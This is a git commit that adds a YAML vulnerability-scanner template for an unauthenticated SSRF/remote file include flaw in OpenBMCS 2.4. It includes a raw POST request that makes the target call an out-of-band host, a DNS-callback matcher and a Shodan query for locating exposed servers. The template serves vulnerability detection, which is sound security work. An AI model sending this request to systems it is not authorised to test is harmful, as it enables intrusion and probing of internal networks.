Create openbmcs-ssrf.yaml

patch-1
Dhiyaneshwaran 2022-01-25 23:18:50 +05:30 committed by GitHub
parent 86a21a68bc
commit 33b0868740
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 28 additions and 0 deletions

View File

@ -0,0 +1,28 @@
id: openbmcs-ssrf
info:
name: OpenBMCS 2.4 Unauthenticated SSRF / RFI
author: dhiyaneshDK
severity: high
description: |
Unauthenticated Server-Side Request Forgery (SSRF) and Remote File Include (RFI) vulnerability exists in OpenBMCS within its functionalities. The application parses user supplied data in the POST parameter 'ip' to query a server IP on port 81 by default. Since no validation is carried out on the parameter, an attacker can specify an external domain and force the application to make an HTTP request to an arbitrary destination host. This can be used by an external attacker for example to bypass firewalls and initiate a service and network enumeration on the internal network through the affected application, allows hijacking the current session of the user, execute cross-site scripting code or changing the look of the page and content modification on current display
reference: https://www.exploit-db.com/exploits/50670
tags: ssrf,oast,openbmcs
metadata:
shodan-query: http.favicon.hash:1550906681
requests:
- raw:
- |
POST /php/query.php HTTP/1.1
Host: {{Hostname}}
Origin: {{BaseURL}}
Referer: {{RootURL}}/index.php
ip={{interactsh-url}}&argu=/
matchers:
- type: word
part: interactsh_protocol # Confirms the DNS Interaction
words:
- "dns"